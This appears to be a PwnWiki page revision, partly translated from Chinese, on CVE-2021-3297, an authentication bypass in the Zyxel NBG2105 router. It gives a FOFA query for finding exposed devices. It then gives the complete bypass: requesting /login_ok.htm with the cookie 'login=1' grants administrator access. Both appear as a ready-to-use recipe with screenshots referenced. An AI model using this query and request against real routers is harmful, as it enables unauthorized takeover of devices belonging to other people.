Difference between revisions of "CVE-2021-3297 Zyxel NBG2105 身份驗證繞過漏洞/en"

From PwnWiki
(Created page with "CVE-2021-3297 Zyxel NBG2105 authentication bypass vulnerability")
 
(Created page with "==Vulnerability Impact==")
Line 1: Line 1:
 
<languages  />
 
<languages  />
  
<div lang="zh-Hant" dir="ltr" class="mw-content-ltr">
+
==Vulnerability Impact==
==漏洞影響==
 
</div>
 
 
<pre>
 
<pre>
 
Zyxel NBG2105
 
Zyxel NBG2105
Line 17: Line 15:
  
  
<div lang="zh-Hant" dir="ltr" class="mw-content-ltr">
+
The front-end file <code>/js/util_gw.js</code> has the front-end verification of the <code>Cookie login</code> parameter.
其中前端文件 <code>/js/util_gw.js</code> 存在前端對 <code>Cookie login</code>參數的校驗。
 
</div>
 
  
 
<div lang="zh-Hant" dir="ltr" class="mw-content-ltr">
 
<div lang="zh-Hant" dir="ltr" class="mw-content-ltr">

Revision as of 16:06, 6 April 2021

Other languages:
Chinese • ‎English • ‎español • ‎中文(繁體)‎

Vulnerability Impact

Zyxel NBG2105


FOFA

app="ZyXEL-NBG2105"

Xnip2021-04-06 09-32-28.jpg


The front-end file /js/util_gw.js has the front-end verification of the Cookie login parameter.

請求如下則會以管理員身份跳轉到 home.htm頁面。 


http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;


Xnip2021-04-06 09-36-42.jpg

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-3297_Zyxel_NBG2105_身份驗證繞過漏洞/en&oldid=1041"